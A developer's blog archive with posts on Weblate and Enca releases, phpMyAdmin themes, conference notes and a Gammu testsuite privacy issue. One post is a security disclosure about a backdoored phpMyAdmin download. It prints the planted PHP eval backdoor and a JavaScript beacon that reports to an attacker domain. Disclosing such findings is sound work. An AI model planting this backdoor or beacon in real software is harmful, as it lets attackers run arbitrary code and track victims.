Michal Čihař - Archive for Jan. 1, 2012

Weblate 1.3 will bring several new features. One of recently implemented parts is source strings review.

Translators quite often find some problems with original string. Be it typo, wrong wording or simply the message is hard to understand. In Weblate 1.3 they will have an option to push feedback to developers. The feedback is stored within Weblate and optionally can be sent to configured email.

In addition to this, there are now checks for source strings as well, which might help you to improve quality of them. New checks are of course covered in the documentation.

You can already try current Weblate on http://demo.weblate.org/, though there are still some things which need polishing.

As the openSUSE Conference and all related events are over, it's time to share my thoughts how it was.

This was actually first conference ever where I helped with organizing, so it was quite new experience for me. Week before it has happened I expected quite a lot of problems, but in the end everything went more or less smoothly.

Having something like 700-800 visitors is IMHO great for first year of LinuxDays, even though it has been collocated with other conferences. Most people came on Saturday and there were less of them on Sunday. Maybe it was result of the party, which lasted for many of them till early morning (I've left around 1 AM and there were still lot of people drinking).

Besides organizing stuff, I also had my own talk about Weblate. Unfortunately not much people has attended it, but those who did gave me some valuable feedback which will be reflected in next Weblate release. Anyway if you want to see my slides from this talk, they are now available on my website.

Today, I've finally found time to process new themes for phpMyAdmin. Result of this are two theme releases.

First one was just a minor update to older theme (Darkblue/orange 2.11), which fixed behavior in Internet Exporer.

Second one was completely new theme for phpMyAdmin 3.5 - blueorange (I admit the name is not too creative). This is actually first contributed theme compatible with 3.5 series.

Of course you can find all of these on our themes page.

This weekend there is going to be a lot happening in Prague - awesome combination of four conferences will happen here.

I'm sure this will be really a great event with lot of interesting things on schedule. Even if you are not interested in technical stuff, future media track might be interesting for you. And of course the event includes huge party on Saturday evening (and welcome party with pre-registration on Friday)/

Anyway if you will be around, you can meet me somewhere there, usually within organizers crew.

PS: There also nice summary of latest news available now.

Data, once put on the internet, are quite hard to delete. You can most likely delete (or ask for deleting) them from place where it has been originally distributed, but you can be never sure where else it has appeared.

Recently, I've seen several requests to remove some data from Gammu testsuite. This testsuite was created using public data available in our bug tracker, simply to be able to verify that we won't break stuff which was earlier fixed.

It turns out that some people did make public some very private stuff, which was included in the testsuite in the end. None of the developers had clue about content of these messages, being in language which nobody of us understands (and being too lazy to run them through Google translator to understand them).

Of course we've removed the data on request, but it's probably already copied in dozen other places on the internet...

Yesterday, phpMyAdmin security team has been notified about backdoor being distributed together with phpMyAdmin zip file on one of SourceForge mirrors.

We quickly analyzed the issue and confirmed that the backdoor is indeed present in phpMyAdmin-3.5.2.2-all-languages.zip file. It allowed anybody to execute arbitrary PHP code, there was file called server_sync.php which simply called eval on passed data:

<?php @eval($_POST['c']);?>

In addition to this, javascript code has been included, which could allow attacker to track vulnerable installations:

var icon ;
icon = document.createElement("img");
icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";
icon.width=0;
icon.height=0;
document.body.appendChild(icon);

All in all looks like simple, but quite effective way to install backdoor, if they would be able to spread this more widely. We've immediately released PMASA-2012-5 to notify our users.

Luckily this was spot quite fast (looking at used domain, the exploit could not be alive before 22th September 2012) and not on much frequent mirror (based on SourceForge official statement about 400 users have downloaded the file with backdoor).

What still remains unclear is whether this was really only targeted on phpMyAdmin, or there were more modified file on this mirror (SourceForge hosts thousands of projects). I've randomly tried few our other download options from this mirror and none of them was affected, but the mirror was taken offline before I could do some more systematic analysis, so this question can now be answered only by SourceForge.

Seems I've forgotten to announce Enca 1.13 here, but I won't do the same mistake with 1.14, which has been released today.

If you don't know Enca, it is an Extremely Naive Charset Analyser. It detects character set and encoding of text files and can also convert them to other encodings using either a built-in converter or external libraries and tools like libiconv, librecode, or cstocs. It's code is currently available at Gitorious.

The full changes for 1.14 release are short:

• Allow standard names for belarusian and slovenian languages, thanks to Branislav Geržo for suggestion.
• Reset strictness when check buffer less than file size, thanks to Sam Liao.
• Fixed typos in man page, thanks to A. Costa.

Still enca is in maintenance mode only and I have no intentions to write new features. However there is no limitation to other contributors :-).

You can download from http://cihar.com/software/enca/.

Quite on schedule, Weblate 1.2 has been released today. It comes with lot of improvements, especially for project admins, handling of po files and improved performance.

Full list of changes for 1.2:

• Weblate now uses South for database migration, please check upgrade instructions if you are upgrading.
• Fixed minor issues with linked git repos.
• New introduction page for engaging people with translating using Weblate.
• Added widgets which can be used for promoting translation projects.
• Added option to reset repository to origin (for privileged users).
• Project or subproject can now be locked for translations.
• Possibility to disable some translations.
• Configurable options for adding new translations.
• Configuration of git commits per project.
• Simple antispam protection.
• Better layout of main page.
• Support for automatically pushing changes on every commit.
• Support for email notifications of translators.
• List only used languages in preferences.
• Improved handling of not known languages when importing project.
• Support for locking translation by translator.
• Optionally maintain Language-Team header in po file.
• Include some statistics in about page.
• Supports (and requires) django-registration 0.8.
• Caching of counted units with failing checks.
• Checking of requirements during setup.
• Documentation improvements.

You can find more information about Weblate on it's website, the code is hosted on Github. If you are curious how it looks, you can try it out on demo server. You can login there with demo account using demo password or register your own user. Ready to run appliances can be found in SUSE Studio Gallery.

Weblate is also being used https://l10n.cihar.com/ as official translating service for phpMyAdmin, Gammu, Weblate itself and others.

If you are free software project which would like to use Weblate, I'm happy to help you with set up or even host Weblate for you (this will be decided case by case as my hosting space is limited).

Update: Weblate appliace has been updated to 1.2 as well.

Great effort of new translators finally forced me to release Ukolovnik 1.4. There are only minor bug fixes besides translations updates.

Full list of changes:

• New Spanish translation thanks to Matías Bellone.
• New Portuguese translation thanks to Everton R.
• Mew Chinese translation thanks to Siramizu.
• New Danish translation thanks to Aputsiaq Niels Janussen.
• Make it work without locales at all.

PS: I don't plan any further development of this tool, in fact I have not touched it in last year and I don't expect this to change.

About a month ago, I've spent some time in Nuremberg and took few night pictures there.

As usual, downloading them from my camera took quite long, but nevertheless now there are online: